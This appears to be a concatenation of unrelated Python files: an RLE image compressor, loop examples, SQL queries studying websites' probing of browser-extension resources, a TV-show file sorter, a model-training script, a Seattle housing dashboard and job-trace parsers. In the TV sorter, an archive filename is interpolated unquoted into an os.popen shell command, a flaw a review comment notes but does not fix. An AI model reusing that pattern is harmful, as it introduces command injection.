            # Emit marker + 2-char hex count + pixel value.
            lf.append("0000")
            ar = hex(c)
            ar = ar[2:]
            while len(ar)!=2:
                ar="0"+ar
            lf.append(ar)
            lf.append(col)
            c=1
            i+=1
        else :
            # No run: copy the pixel through unchanged.
            lf.append(l[i])
            i+=1
    return lf
def main():
    """Read every image in d_img/ (expected to be named 0.png, 1.png, ...),
    RLE-compress each one, and return (compressed_images, processed_count).
    """
    frames = []
    count = 0
    filenames = next(os.walk("d_img/"))[2]
    print(len(filenames), " files\n")
    for index in range(len(filenames)):
        path = "d_img/" + str(index) + ".png"
        try:
            print(str(count) + ".png")
            raw = image_read(path)
            frames.append(RLE_compresse(raw))
            count = count + 1
        except:
            # unreadable/missing image: report it but keep the counter moving
            print("error img ", index)
            count = count + 1
    return frames, count
def ar2bin(d, q):
    """Write each compressed image in *d* to img/<i>.bin.

    Each file starts with the 9-byte header "IBMP_p" + 00 00 + a final byte
    that is 01 when password protection is enabled (q == 1), else 00; the
    image's hex tokens follow as raw bytes.

    d -- list of images, each a list of hex-string tokens
    q -- security flag (1 = password-protected header variant)
    """
    if q == 1:
        header = bytearray.fromhex("49424d505f70000001")
    else:
        header = bytearray.fromhex("49424d505f70000000")
    for i in range(len(d)):
        # `with` guarantees the file is closed even on error (the old code
        # leaked the handle on exceptions and called close() twice).
        with open("img/" + str(i) + ".bin", "wb") as out:
            out.write(header)
            for token in d[i]:
                try:
                    chunk = bytearray.fromhex(token)
                except ValueError:
                    # BUG FIX: an invalid token used to silently re-write the
                    # previous token's bytes (stale `a`); now it is skipped.
                    continue
                out.write(chunk)
    return None
def ar2bin_v(d, q, v):
    """Write all compressed frames in *d* into one video file img/v0-<N>.bin
    (N = frame count).

    Header layout: magic "IBMP_v", one byte frame count, one byte frame
    delay *v* (ms), one byte security flag (01 when q == 1, else 00).
    The hex tokens of every frame follow as raw bytes.

    d -- list of frames, each a list of hex-string tokens
    q -- security flag (1 = password-protected)
    v -- inter-frame delay in milliseconds (0-255)
    """
    n_frames = len(d)
    print(n_frames)
    with open("img/v0-" + str(n_frames) + ".bin", "wb") as out:
        # BUG FIX: the header was previously only written when the very
        # first frame had at least one token; now it is written always.
        out.write(bytearray.fromhex("49424d505f76"))
        out.write(bytearray.fromhex(hex(n_frames)[2:].zfill(2)))
        out.write(bytearray.fromhex(hex(v)[2:].zfill(2)))
        out.write(bytearray.fromhex("01" if q == 1 else "00"))
        for frame in d:
            for token in frame:
                try:
                    chunk = bytearray.fromhex(token)
                except ValueError:
                    # BUG FIX: invalid tokens used to silently re-write the
                    # previous token's bytes (stale `a`); now they are skipped.
                    continue
                out.write(chunk)
    return None
import time

# Interactive driver: compress the images, optionally write a password
# file, then emit either a single video container or one file per image.
data, n_img = main()
issec = 0
vid = 0
b = input("secur ? [y/n]\n")
if b == "y":
    issec = 1
    print("secur : on\n")
    mpd = input("password ? use digit ['0123456789'] (8 pin max) \n")
    try:
        if len(mpd) > 8:
            # too-long PIN: route through the shared error path below
            raise ValueError("password longer than 8 digits")
        f_mpd = int(mpd)  # raises ValueError for non-digit input
        print(f_mpd)
        with open("img/pass.bin", "w") as file2:
            file2.write("IBMP_s\x20\x20")
            file2.write(str(f_mpd))
        print("\nok\n")
    except Exception:
        # BUG FIX: this path used os.wait(2) -- os.wait() takes no arguments
        # and waits on a child process, so it raised TypeError; the intent
        # was clearly a 2 s pause. The old bare `except:` also caught the
        # SystemExit raised by exit(), printing "error" twice and crashing.
        print("error\n")
        time.sleep(2)
        exit()
a = input("video : y/n\n")
if a == "y":
    b = input("frame delay (ms)\n")
    try:
        vid = int(b)
        if vid > 255:
            vid = 255  # delay is stored in a single byte
            print(" >> 255 (val max)\n")
        print("ok\n")
    except ValueError:
        print("error\n")
        time.sleep(2)  # BUG FIX: was os.wait(2), see above
        exit()
    ar2bin_v(data, issec, vid)
else:
    print("\npicture\n")
    ar2bin(data, issec)
print("\nend \t DONE\n")
os.system("pause")
|
#!/usr/bin/python3
# Print 0..9; 'Done' is printed on every iteration, exactly as in the
# original while-loop version (the print was part of the loop body).
for a in range(0, 10):
    print(a)
    print('Done')  # part of the loop body, printed each iteration
for i in range(1, 10):
    print(i)
# Example of iterating through array
bridgera = ['Arijit', 'Soumya', 'Gunjan', 'Arptia', 'Bishwa', 'Rintu', 'Satya', 'Lelin']
for i, member in enumerate(bridgera):
    print(i, member)
from collections import defaultdict
import tldextract
from extensionanalysis import chromecast_extension_ids
from query import Query
class QueryWar(Query):
    # Queries over the `warrequest` table: statistics on web-accessible
    # resource (WAR) requests observed on crawled websites.
    # NOTE(review): `~*` below is PostgreSQL's case-insensitive POSIX regex
    # operator, and `get_initiator` is presumably a server-side SQL function
    # over the stored request object -- confirm against the DB schema.
    def query_war_schemes(self) -> list:
        """Get the number of WAR requests and the number of websites performing WAR requests grouped per URL scheme"""
        results = []
        # ".*" gives the overall totals; the rest split by extension scheme.
        schemes = [".*", "^chrome-extension://", "^moz-extension://", "^opera-extension://", "^ms-browser-extension://", "^chrome://"]
        for scheme in schemes:
            count = self.db.execute_sql(
                sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* %(scheme)s;",
                params={"scheme": (scheme,)}
            ).fetchone()
            results.append({"scheme": scheme.replace("^", "").replace("://", ""), "requests": count[0], "websites": count[1]})
        # Get count for chrome-extension:// with Chrome Media Router only
        count_wo_cast = self.db.execute_sql(
            sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* '^chrome-extension://' AND requested_extension_id IN %(chromecast_extension_ids)s;",
            params={"chromecast_extension_ids": tuple(chromecast_extension_ids)}
        ).fetchone()
        results.append({"scheme": "chrome-extension (Chrome Media Router only)", "requests": count_wo_cast[0], "websites": count_wo_cast[1]})
        # Get count for chrome-extension:// with Chrome Media Router only requests excluded
        count_wo_cast = self.db.execute_sql(
            sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* '^chrome-extension://' AND requested_extension_id NOT IN %(chromecast_extension_ids)s;",
            params={"chromecast_extension_ids": tuple(chromecast_extension_ids)}
        ).fetchone()
        results.append({"scheme": "chrome-extension (Chrome Media Router excluded)", "requests": count_wo_cast[0], "websites": count_wo_cast[1]})
        return results
    def query_war_requested_extensions(self) -> dict:
        """Count WAR requests per requested extension id.

        `request_count_clean` deduplicates repeated requests of the same
        extension by the same website. Delegates to `Query._query_extensions`.
        """
        query = """
        SELECT
            requested_extension_id,
            COUNT(requested_extension_id) AS request_count,
            COUNT(DISTINCT (requested_extension_id || website_id)) AS request_count_clean
        FROM
            warrequest
        GROUP BY
            requested_extension_id
        ORDER BY
            request_count_clean DESC;
        """
        return self._query_extensions(query)
    def query_websites_with_war_requests(self) -> list:
        """List websites performing WAR requests, with per-site request counts.

        For websites probing more than 5 distinct extensions, the individual
        requests are attached as well (likely extension-enumeration candidates).
        """
        websites = []
        # Get website URLs together with the number of distinct requested extensions and the number of requested WARs
        cursor = self.db.execute_sql("""
            SELECT
                website.id,
                website.url,
                COUNT(DISTINCT requested_extension_id) AS distinct_extensions_requested_count,
                COUNT(requested_extension_id) AS requested_wars_count
            FROM
                warrequest, website
            WHERE
                website.id = warrequest.website_id
            GROUP BY
                website.id, website.url
            ORDER BY
                distinct_extensions_requested_count DESC;
        """)
        for website_id, url, distinct_extensions_requested_count, requested_wars_count in cursor.fetchall():
            website = {
                "id": website_id,
                "url": url,
                "distinct_extensions_requested_count": distinct_extensions_requested_count,
                "requested_wars_count": requested_wars_count,
                "requests": []
            }
            if distinct_extensions_requested_count > 5:
                website["requests"] = self.query_war_requests_for_website(website_id)
            websites.append(website)
        return websites
    def query_war_requests_for_website(self, website_id: int) -> list:
        """Return every WAR request of one website: extension id, requested WAR URL, and initiator."""
        cursor = self.db.execute_sql("""
            SELECT requested_extension_id, requested_war, get_initiator(request_object) FROM warrequest WHERE website_id = %s;
        """, (website_id,))
        requests = []
        for requested_extension_id, requested_war, initiator in cursor.fetchall():
            requests.append({
                "requested_extension_id": requested_extension_id,
                "requested_war": requested_war,
                "initiator": initiator
            })
        return requests
    def query_war_requests_with_initiators(self) -> list:
        """Get a list of dicts of WAR requests. Contains the requested extension_id, website_id and
        the request initiator. Chromecast requests are excluded.
        """
        war_requests = []
        # NOTE(review): the two excluded ids are presumably the Chromecast /
        # Chrome Media Router extensions -- compare `chromecast_extension_ids`.
        cursor = self.db.execute_sql("""
            SELECT
                requested_extension_id,
                website_id,
                get_initiator(request_object)
            FROM warrequest
            WHERE requested_extension_id NOT IN ('pkedcjkdefgpdelpbcmbmeomcjbeemfm', 'enhhojjnijigcajfphajepfemndkmdlo')
            ;
        """)
        for extension_id, website_id, initiator_url in cursor.fetchall():
            # reduce the initiator URL to its registrable domain (eTLD+1)
            initiator_domain = tldextract.extract(initiator_url).registered_domain
            war_requests.append({
                "extension_id": extension_id,
                "website_id": website_id,
                "initiator": initiator_domain
            })
        return war_requests
    def query_war_extensions_requested_together(self) -> dict:
        """Get the ids of the requested extensions without duplicates for each website. Chromecast requests are excluded.

        :return: e.g. {"198542": ["pkedcjkdefgpdelpbcmbmeomcjbeemfm","enhhojjnijigcajfphajepfemndkmdlo"]}
        """
        wars = defaultdict(list)
        cursor = self.db.execute_sql("SELECT website_id, requested_extension_id FROM warrequest WHERE requested_extension_id NOT IN ('pkedcjkdefgpdelpbcmbmeomcjbeemfm', 'enhhojjnijigcajfphajepfemndkmdlo');")
        for website_id, requested_extension_id in cursor.fetchall():
            if requested_extension_id not in wars[website_id]:
                wars[website_id].append(requested_extension_id)
        return dict(wars)
    def query_war_request_3rd_party(self) -> dict:
        """Returns websites that perform WAR requests grouped by request source (same/3rd party domain/YouTube).

        If a websites performs multiple request, only one is counted (per category)."""
        # Use sets to ensure that websites are only counted once
        websites = {
            "same_domain": set(),
            "other_domain": set(),
            "youtube": set()
        }
        query_string = "SELECT website_id, url, get_initiator(request_object) AS initiator FROM warrequest, website WHERE warrequest.website_id = website.id;"
        cursor = self.db.execute_sql(query_string)
        for website_id, url, req_url in cursor.fetchall():
            # compare registrable domains (eTLD+1) rather than full hosts
            website_domain = tldextract.extract(url).registered_domain
            request_source_domain = tldextract.extract(req_url).registered_domain
            if request_source_domain in ["youtube.com", "youtube-nocookie.com"]:
                websites["youtube"].add(url)
            elif website_domain != request_source_domain:
                websites["other_domain"].add(url)
            else:
                websites["same_domain"].add(url)
        return websites
    def query_war_request_f5(self):
        """ Gather information on WAR requests where the initiator URL contains the string '/TSPD/'
        which indicates that a F5 Big IP appliance is used.
        """
        # %% escapes the literal % wildcard for the SQL driver's formatting
        query_string = "SELECT COUNT(id) AS request_count, COUNT(DISTINCT website_id) AS distinct_websites_count, COUNT(DISTINCT requested_extension_id) distinct_extensions_count FROM warrequest WHERE get_initiator(request_object) LIKE '%%/TSPD/%%';"
        result = self.db.execute_sql(query_string).fetchone()
        return {
            "request_count": result[0],
            "distinct_websites_count": result[1],
            "distinct_extensions_count": result[2]
        }
|
#!/usr/bin/python
# tv_sort.py
# detects and sorts tv shows automatically based on filename
import os
import shutil
import re
import xmlrpclib
# Building blocks for show-name / episode-number matching.
words = r'([\'\w\.\- ]+?)'  # lazy "show name" fragment (letters, dots, dashes, spaces)
spacers = re.compile(r'[\s_\-\.]+')  # characters used as word separators in filenames
# Episode-numbering styles, tried in this order by run(): S01E02, 2014.05.12, 1x02, 102.
show_filename = re.compile(words + r'S(\d+)\s?EP?(\d+)', re.IGNORECASE)
show_filename_2 = re.compile(words + r'(\d{4}\.[012]?[0-9]\.\d{1,2})()', re.IGNORECASE)
show_filename_3 = re.compile(words + r'(\d+)x(\d+)', re.IGNORECASE)
show_filename_4 = re.compile(words + r'(\d+?)(\d{1,2})', re.IGNORECASE)
word_match = re.compile('(%s+)' % words, re.IGNORECASE)  # leading word run of a folder name
the_match = re.compile(r'(.*?)(, The)$', re.IGNORECASE)  # trailing ", The" suffix
hd_match = re.compile(r'(720p|1080p)')  # HD resolution markers
date = r'(19\d{2}|2\d{3})'  # a four-digit year
date_match = re.compile(r' ?(\(%s\)|%s) ?' % (date, date))  # year, optionally parenthesised
extensions = ('.mp4', '.avi', '.mkv', '.m4v', '.wmv', '.mpg', '.mpeg')  # recognised video files
def forward_the(name):
    """Move a trailing ', The' to the front: 'Office, The' -> 'The Office'."""
    if not the_match.match(name):
        return name
    return the_match.sub(r'The \1', name)
class Auto(dict):
    """Key/value settings parsed from a folder's '.auto' override file.

    The file format is one `key: value` pair per line; surrounding whitespace
    and single/double quotes around the value are stripped.  Lines without a
    colon are ignored.  A missing file yields an empty mapping.
    """
    def __init__(self, path):
        self.path = path
        if os.path.isfile(path):
            # BUG FIX: the original opened the file without ever closing it,
            # leaking a handle per Folder; 'with' guarantees closure.
            with open(path, 'r') as f:
                for line in f:
                    line = line.strip()
                    if line and ':' in line:
                        key, value = line.split(':', 1)
                        key, value = key.strip(), value.strip()
                        value = value.strip('\'"')
                        self[key] = value
class Folder:
    """A target show folder.

    Knows how to decide whether a filename belongs to the show it represents
    (match) and how to build the destination name for an episode (rename).
    Per-folder behaviour can be overridden via a '.auto' file.
    """
    def __init__(self, path):
        self.path = path
        self.name = os.path.split(path)[1]
        self.regex = None
        # default layout: "Season 1/Show S01E02.ext"
        self.naming = 'Season %(season)s/%(name)s %(epstr)s'
        # optional per-folder overrides ('regex', 'name') from a '.auto' file
        self.auto = Auto(os.path.join(path, '.auto'))
        if 'regex' in self.auto:
            try:
                self.regex = re.compile(self.auto['regex'], re.IGNORECASE)
            except:
                print 'error parsing regex for: %s' % self.auto.path
        if 'name' in self.auto:
            self.naming = self.auto['name']
        if not self.regex:
            # fall back to matching the folder's own (normalised) name
            # TODO: this is terrible for single-letter names
            text = word_match.match(self.name).group()
            text = spacers.sub(' ', text)
            self.regex = re.compile(re.escape(text), re.IGNORECASE)
    def match(self, name):
        """Return True when *name* looks like an episode of this show."""
        match = self.regex.search(name)
        if match:
            return True
        return False
    def rename(self, name, season, episode, hd=None, ext='.avi'):
        """Build (target dir, relative target filename, episode string)."""
        if season and episode:
            season = int(season)
            episode = int(episode)
            epstr = 'S%02dE%02d' % (season, episode)
        else:
            # date-style episodes carry the raw date in 'season' and no episode
            epstr = season
        if not self.auto:
            # no '.auto' file: use a flat "Show S01E02" name without a season dir
            self.naming = '%(name)s %(epstr)s'
        target = self.naming % {'name':name, 'season':season, 'episode':episode, 'epstr':epstr}
        if hd:
            target = '%s (%s)' % (target, hd)
        return self.path, target + ext, epstr
    def __repr__(self):
        return '<Folder "%s">' % self.name
def extract(path):
    """Unrar the first .rar archive found in *path* and return the resulting
    video file as (filename, extension), or (None, None) if none appears.

    Temporarily chdirs into *path*; the original working directory is restored
    on every return path.
    """
    cwd = os.getcwd()
    os.chdir(path)
    first = os.listdir('.')
    for entry in first:
        if entry.endswith('.rar'):
            print 'Extracting: %s' % entry,
            # NOTE(review): entry is interpolated unquoted into a shell command;
            # archive names containing spaces would break this — flagged only.
            os.popen('unrar x -o- %s' % entry)
            break
    # after extraction (or if no archive), look for any recognised video file
    second = os.listdir('.')
    for entry in second:
        ext = os.path.splitext(entry)[1]
        if ext in extensions:
            print '=> "%s"' % entry
            os.chdir(cwd)
            return entry, ext
    else:
        print '- Nothing found :('
        os.chdir(cwd)
        return None, None
def move(path, filename, name, season, episode, folders, force_move=False, dry_run=False, link=False, hd=None, ext='.avi'):
    """Place one detected episode file into its show folder.

    Returns True when the show has no matching folder (caller then skips the
    show for the rest of the run); returns None otherwise, including when the
    target already exists or the source vanished.
    """
    copy = True
    # find the first target folder whose regex matches the show name
    for folder in folders:
        if folder.match(name):
            break
    else:
        print 'Skipped "%s" (example: %s)' % (name, filename)
        return True
    target_folder, target, epstr = folder.rename(name, season, episode, hd, ext)
    no_ext = os.path.splitext(os.path.join(target_folder, target))[0]
    test_base = os.path.split(no_ext)[0]
    # bail out if the episode already exists under ANY known video extension
    for test in extensions:
        test_path = no_ext + test
        test_filename = os.path.split(test_path)[1]
        if not os.path.exists(test_base):
            if not dry_run:
                os.makedirs(test_base)
            break
        else:
            if test_base == path:
                # source and destination are the same directory
                if test_filename == filename:
                    return
            else:
                # case-insensitive duplicate check in the destination
                for existing in os.listdir(test_base):
                    if existing.lower() == test_filename.lower():
                        return
    path = os.path.join(path, filename)
    if not os.path.exists(path):
        return
    if os.path.isdir(path) and not dry_run:
        # a directory is assumed to be a rar release: extract, then MOVE the
        # extracted file (copy=False) and recompute the target with its extension
        entry, ext = extract(path)
        if not entry:
            print 'no extracted file found.'
            return
        else:
            print 'success.'
            path = os.path.join(path, entry)
            copy = False
            target_folder, target, epstr = folder.rename(name, season, episode, hd, ext)
    target_path, target_filename = os.path.split(os.path.join(target_folder, target))
    print ('%s %s => %s' % (name, epstr, target)),
    target = os.path.join(target_folder, target)
    if dry_run:
        verb = copy and 'copy' or 'move'
        print 'Would %s %s => %s' % (verb, path, target)
    else:
        if copy and not force_move:
            if link:
                # prefer a hardlink; fall back to a copy if linking fails
                try:
                    os.link(path, target)
                    print 'linked to target'
                except IOError:
                    link = False
            if not link:
                shutil.copyfile(path, target)
                print 'copied to target.'
        else:
            os.rename(path, target)
            print 'moved to target.'
def run(source, targets, force_move=False, dry_run=False, link=False):
    """Scan *source* for episode files and sort them into show folders found
    directly under the *targets* directories.

    *source* is either a directory path or an 'rtorrent://host/scgi' URI, in
    which case completed downloads are fetched from rtorrent via XML-RPC.
    """
    print
    print 'If anything is skipped, make sure the show name exists as a folder in one of the targets'
    print 'You can also use .auto files (see the readme) to change the show matching a folder'
    # every first-level subdirectory of every target is a candidate show folder
    folders = []
    for target in targets:
        if not os.path.isdir(target): continue
        for folder in os.listdir(target):
            path = os.path.join(target, folder)
            if not os.path.isdir(path): continue
            folders.append(Folder(path))
    files = set()
    if source.startswith('rtorrent://'):
        # ask a running rtorrent instance for its completed downloads
        rtorrent_uri = source.replace('rtorrent', 'http')
        x = xmlrpclib.ServerProxy(rtorrent_uri)
        seeding = x.download_list()
        for torrent in seeding:
            if not x.d.complete(torrent): continue
            files.add(x.d.get_base_path(torrent))
    else:
        for filename in os.listdir(source):
            files.add(os.path.join(source, filename))
    skip = set()  # show names with no matching folder — skip repeats
    for path in sorted(files):
        path, filename = os.path.split(path)
        # strip HD tags first so they don't confuse the episode-number regexes
        cleaned_filename = hd_match.sub('', filename)
        match1 = show_filename.match(cleaned_filename)
        match2 = show_filename_2.match(cleaned_filename)
        match3 = show_filename_3.match(cleaned_filename)
        match4 = show_filename_4.match(cleaned_filename)
        hd = hd_match.search(filename)
        if hd:
            hd = hd.group()
        # first matching pattern wins (S01E02 style has priority)
        matches = [m for m in (match1, match2, match3, match4) if m]
        if matches:
            match = matches[0]
            name, season, episode = match.groups()
            # replace all spacer chars with spaces
            name = spacers.sub(' ', name)
            # strip the year from the name
            name = date_match.sub(' ', name)
            name = name.strip()
            first = name[0]
            if first == first.lower():
                # all-lowercase release names get Title Case
                name = ' '.join(word.capitalize() for word in name.split(' '))
            if name in skip: continue
            if name.endswith(' S'):
                # work around a bug when encountering full season downloads
                continue
            skip_name = move(path, filename, name, season, episode, folders, force_move, dry_run, link, hd)
            if skip_name:
                skip.add(name)
def usage():
    """Print command-line help and exit with status 1."""
    print 'Usage: ./tv_sort.py [flags] <source> <target folder> [target folder] [target folder]...'
    print 'Sorts TV shows into folders.'
    print '  Flags:'
    print '    -m, --move: force moving of normal files (extracted files are always moved)'
    print '    -l, --link: hardlink files instead of copying'
    print '    -d, --dry: dry run - only display what would be moved/copied'
    print '  Source options:'
    print '    * /path/to/folder'
    print '    * rtorrent://localhost/scgi_path'
    sys.exit(1)
if __name__ == '__main__':
    import sys
    args = []
    force_move = False
    dry_run = False
    link = False
    for arg in sys.argv[1:]:
        # 'sort' is the flag's characters in sorted order so combined flags
        # like '-dm' / '-md' compare equal ('-' sorts before the letters).
        sort = None
        if arg.startswith('-'):
            sort = ''.join(sorted(arg))
        if arg in ('-m', '--move'):
            force_move = True
        elif arg in ('-d', '--dry'):
            dry_run = True
        elif arg in ('-l', '--link'):
            link = True
        elif sort:
            # BUG FIX: the character class used to be [mdv], which never
            # matched the 'l' (link) flag even though the body tests for it;
            # the supported single-letter flags are m, d and l.
            if re.match(r'-[mdl]{1,3}', sort):
                if 'm' in sort: force_move = True
                if 'd' in sort: dry_run = True
                if 'l' in sort: link = True
        else:
            args.append(arg)
    if len(args) < 2:
        usage()
    else:
        run(args[0], args[1:], force_move=force_move, dry_run=dry_run, link=link)
|
# Train a model
# +
import pickle
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.ensemble import RandomForestClassifier
from sklearn_evaluation import plot
# + tags=["parameters"]
upstream = ['join']  # placeholder: ploomber injects the real upstream product paths at runtime
product = None  # placeholder: ploomber injects the product spec at runtime
# -
# Load the joined feature table produced by the upstream 'join' task.
df = pd.read_parquet(str(upstream['join']))
X = df.drop('target', axis='columns')
y = df.target
# Hold out a third of the data for evaluation; fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X,
                                                    y,
                                                    test_size=0.33,
                                                    random_state=42)
clf = RandomForestClassifier()
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# Text report plus confusion matrix for the held-out split.
print(classification_report(y_test, y_pred))
plot.confusion_matrix(y_test, y_pred)
# Persist the fitted model to the path declared in 'product'.
with open(product['model'], 'wb') as f:
    pickle.dump(clf, f)
|
# importar pacotes
import pandas as pd
import pydeck as pdk
import streamlit as st
# import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# from datetime import date
# load the data (pre-cleaned King County house-sales CSV)
df = pd.read_csv('kc_dataset_clean.csv')
# dashboard
st.title("Casas em Seattle")
st.markdown(
    """
    Empresas imobiliárias online oferecem avaliações de casas usando técnicas de aprendizado de máquina.
    O objetivo deste relatório é analisar as vendas de casas em King County, Seattle, Estado de Washington, EUA,
    usando técnicas de ciência de dados. O conjunto de dados consiste em dados históricos de casas vendidas
    entre maio de 2014 a maio de 2015.
    """
)
# 'y/m' = year-month prefix of the date string, e.g. '2014-05'
df['y/m'] = df['date'].apply(lambda x: str(x)[:7])
# sidebar: each checkbox toggles one chart on the main page
st.sidebar.info("Foram carregadas {} linhas.".format(df.shape[0]))
if st.sidebar.checkbox("Ver dados de preço por número de quartos"):
    fig = plt.figure(figsize=(15, 12))
    plt.title('Média de preço de casa por número de quartos', fontsize=33)
    plt.ylabel('price', fontsize=22)
    plt.xlabel('bedrooms', fontsize=22)
    # mean price grouped by bedroom count
    media_quarto = df[['bedrooms', 'price']].groupby('bedrooms').mean().reset_index()
    sns.barplot(x='bedrooms', y='price', data=media_quarto)
    st.write(fig)
if st.sidebar.checkbox("Média de preço de casa por notas"):
    fig = plt.figure(figsize=(15, 12))
    plt.title('Média de preço de casa por notas', fontsize=33)
    plt.ylabel('price', fontsize=22)
    plt.xlabel('grade', fontsize=22)
    # mean price grouped by construction grade
    media_nota = df[['grade', 'price']].groupby('grade').mean().reset_index()
    sns.barplot(x='grade', y='price', data=media_nota)
    st.write(fig)
if st.sidebar.checkbox("Evolução dos preços em 1 ano"):
    fig = plt.figure(figsize=(15, 12))
    plt.title('Evolução dos preços em 1 ano', fontsize=33)
    plt.ylabel('', fontsize=22)
    plt.xlabel('', fontsize=22)
    # month-over-month percentage change of the mean price
    media_preco = df[['y/m', 'price']].groupby('y/m').mean().reset_index()
    media_preco['growth_price'] = 100 * media_preco['price'].pct_change()
    sns.barplot(x='y/m', y='growth_price', data=media_preco)
    plt.xticks(rotation=45)
    st.write(fig)
if st.sidebar.checkbox("Média de preços por mês em 1 ano"):
    fig = plt.figure(figsize=(15, 12))
    plt.title('Média de preços por mês', fontsize=33)
    plt.ylabel('', fontsize=22)
    plt.xlabel('', fontsize=22)
    # seaborn aggregates price per 'y/m' bucket itself here
    sns.barplot(x='y/m', y='price', data=df)
    st.write(fig)
df.date = pd.to_datetime(df.date)
ano_selecionado = st.sidebar.slider("Selecione um ano", 2014, 2015)
df_selected = df[df.date.dt.year == ano_selecionado]
st.subheader('Mapa da cidade de Seattle')
# st.map(df)
# 3D hexagon-density map of sales for the selected year, centred on Seattle
st.pydeck_chart(pdk.Deck(
    initial_view_state=pdk.ViewState(
        latitude=47.608013,
        longitude=-122.335167,
        zoom=7.5,
        min_zoom=3,
        max_zoom=15,
        pitch=40.5,
        bearing=-27.36
    ),
    layers=[
        pdk.Layer(
            'HexagonLayer',
            data=df_selected[['lat', 'lon']],  # df
            get_position='[lon,lat]',
            radius=150,
            auto_highlight=True,
            elevation_scale=25,
            pickable=False,  # picking interferes with map manipulation
            elevation_range=[0, 3000],
            extruded=True,
            stroked=True,
            filled=True,
            wireframe=True
        )
    ],
))
|
#!/usr/bin/env python3
#
# Copyright 2019 Peifeng Yu <peifeng@umich.edu>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 2 04:25:58 2018
@author: peifeng
"""
from __future__ import print_function, absolute_import, division
import re
from datetime import datetime
from collections import defaultdict
import multiprocessing as mp
from pathlib import Path
import subprocess as sp
import tempfile
import pandas as pd
#import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import plotutils as pu
import compmem as cm
def load_case(path):
    """Parse a Salus case log into one row per model.

    The log is space-separated with columns date/time/event/skip/Model; the
    result has Queued/Started/Finished timestamps plus derived 'queuing' and
    'JCT' timedeltas and a numeric job number 'No'.
    """
    df = pd.read_csv(path, header=None, sep=' ',
                     names=['date', 'time', 'event', 'skip', 'Model'],
                     parse_dates=[['date', 'time']])
    df = df[['date_time', 'event', 'Model']]
    df['timestamp'] = df['date_time']
    df = df.drop('date_time', axis=1)
    # one row per model, one column per lifecycle event (first occurrence wins)
    wls = df.pivot_table(values='timestamp', index=['Model'],
                         columns='event', aggfunc='first').reset_index()
    for col in ['Started', 'Queued', 'Finished']:
        # drop the trailing delimiter character the logger appends, then parse
        wls[col] = wls[col].str[:-1]
        wls[col] = pd.to_datetime(wls[col])
    wls['queuing'] = wls.Started - wls.Queued
    wls['JCT'] = wls.Finished - wls.Queued
    # convenience: trailing number of 'name.tf.Niter.No' identifies the job
    wls['No'] = pd.to_numeric(wls['Model'].str.rpartition('.')[2])
    return wls
def load_trace(path, fifo=True):
    """Load a submission trace CSV and simulate a schedule from it.

    With fifo=True, jobs run back-to-back on a single resource in submit
    order; otherwise every job is assumed to start immediately at its submit
    time (ideal/no-queuing baseline).  Returns the same per-model timing
    columns as load_case, with times as timedeltas from zero.
    """
    df = pd.read_csv(path)
    df = df.sort_values(by='submit_time')
    if fifo:
        models = defaultdict(dict)
        curr = 0  # time at which the single simulated resource becomes free
        for idx, row in df.iterrows():
            # a job cannot start before it is submitted
            if curr < row['submit_time']:
                curr = row['submit_time']
            models[idx]['Queued'] = row['submit_time']
            models[idx]['Started'] = curr
            curr += row['duration']
            models[idx]['Finished'] = curr
        data = [
            {
                "Model": '{model_name}.tf.{iterations}iter.{job_id}'.format(**df.iloc[idx]),
                "Finished": m['Finished'],
                "Queued": m['Queued'],
                "Started": m['Started'],
                "queuing": m['Started'] - m['Queued'],
                "JCT": m['Finished'] - m['Queued']
            }
            for idx, m in models.items()
        ]
        df = pd.DataFrame(data)
    else:
        data = [
            {
                "Model": f"{row.model_name}.tf.{row.iterations}iter.{row.job_id}",
                "Finished": row.submit_time + row.duration,
                "Queued": row.submit_time,
                "Started": row.submit_time,
                "queuing": 0,
                "JCT": row.duration
            }
            for idx, row in df.iterrows()
        ]
        df = pd.DataFrame(data)
    # express everything as timedeltas to match load_case's output
    for col in ['Finished', 'Queued', 'Started', 'queuing', 'JCT']:
        df[col] = pd.to_timedelta(df[col], unit='s')
    df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
    return df
def load_refine(pathdir):
    """Extract 'preempt_select_sess' events from the server log in *pathdir*
    and annotate each with the model name of the session it refers to."""
    # load preempt select events (grep into a temp file, then reuse cm's parser)
    with tempfile.NamedTemporaryFile() as f:
        server_output = pathdir/'server.output'
        sp.check_call(['grep', 'preempt_select_sess', str(server_output)], stdout=f)
        f.flush()
        df = cm.load_generic(f.name, event_filters=['preempt_select_sess'])
    df = df.drop(['evt', 'level', 'loc', 'thread', 'type'], axis=1)
    # convert UTC from server to local
    df['timestamp'] = df.timestamp.dt.tz_localize('UTC').dt.tz_convert('US/Eastern').dt.tz_localize(None)
    sess2Model = {}
    # model name -> sess handle, recovered from the per-job client logs
    ptn = re.compile('Created session with handle (?P<sess>.+)$')
    for fpath in pathdir.glob('*.*.*.*.output'):
        with fpath.open() as f:
            for line in f:
                m = ptn.search(line)
                if m:
                    sess2Model[m.group('sess')] = fpath.name.rstrip('.output')
    # add model name info to it
    df['Model'] = df.Sess.map(sess2Model)
    # make sure every session is covered
    assert df.Model.isnull().sum() == 0
    # convenience: trailing number of the model name identifies the job
    df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
    return df
def load_serverevents(pathdir):
    """Extract 'lane_assigned' events (session -> lane id) from the server log
    and annotate each with the owning model's name."""
    # sess handle -> lane id
    with tempfile.NamedTemporaryFile() as f:
        server_output = pathdir/'server.output'
        sp.check_call(['grep', 'lane_assigned', str(server_output)], stdout=f)
        f.flush()
